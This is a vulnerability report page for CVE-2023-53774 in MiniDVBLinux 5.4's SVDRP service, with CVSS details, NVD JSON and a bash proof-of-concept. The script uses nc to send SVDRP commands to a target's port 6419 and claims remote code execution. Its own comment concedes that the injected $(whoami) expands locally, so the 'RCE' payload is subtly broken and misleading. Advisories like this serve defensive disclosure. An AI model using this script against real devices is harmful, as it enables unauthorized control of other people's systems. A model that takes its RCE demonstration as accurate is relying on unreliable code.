Security Vulnerability Report
CVE-2023-53774 CVSS 9.8 CRITICAL

Published: 2025-12-09 21:15:53
Last Modified: 2025-12-19 19:16:20

Description

MiniDVBLinux 5.4 contains a remote code execution vulnerability in the SVDRP protocol that allows remote attackers to send commands to manipulate TV systems. Attackers can send crafted SVDRP commands through the svdrpsend.sh script to execute messages and potentially control the video disk recorder remotely.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:minidvblinux:minidvblinux:*:*:*:*:*:*:*:* - VULNERABLE
MiniDVBLinux 5.4 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2023-53774 PoC - MiniDVBLinux SVDRP Remote Code Execution
# Target: MiniDVBLinux 5.4 with VDR SVDRP service

TARGET_HOST="$1"
TARGET_PORT="6419"

if [ -z "$TARGET_HOST" ]; then
    echo "Usage: $0 <target_ip>"
    exit 1
fi

echo "[*] CVE-2023-53774 PoC for MiniDVBLinux SVDRP RCE"
echo "[*] Target: $TARGET_HOST:$TARGET_PORT"

# Connect to SVDRP and send malicious command
# The vulnerability allows command injection through SVDRP protocol
(echo -e "PING;1\nLSTR\nQUIT" | nc -q 2 "$TARGET_HOST" "$TARGET_PORT") &
sleep 1

# Example: Send crafted SVDRP command for RCE
# Note: $(whoami) sits inside double quotes, so the local shell expands it
# before the MESG text is sent over the connection.
echo "[+] Sending malicious SVDRP command..."
echo -e "MESG '$(whoami)'\nQUIT" | nc -w 3 "$TARGET_HOST" "$TARGET_PORT"
echo "[+] Check if command was executed on target system"

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53774", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:52.780", "lastModified": "2025-12-19T19:16:19.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MiniDVBLinux 5.4 contains a remote code execution vulnerability in the SVDRP protocol that allows remote attackers to send commands to manipulate TV systems. Attackers can send crafted SVDRP commands through the svdrpsend.sh script to execute messages and potentially control the video disk recorder remotely."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:minidvblinux:minidvblinux:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.4", "matchCriteriaId": "2D9CAD03-85CC-41CC-B745-371250902E61"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51093", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.minidvblinux.de", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/minidvblinux-simple-videodiskrecorder-protocol-remote-code-execution", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}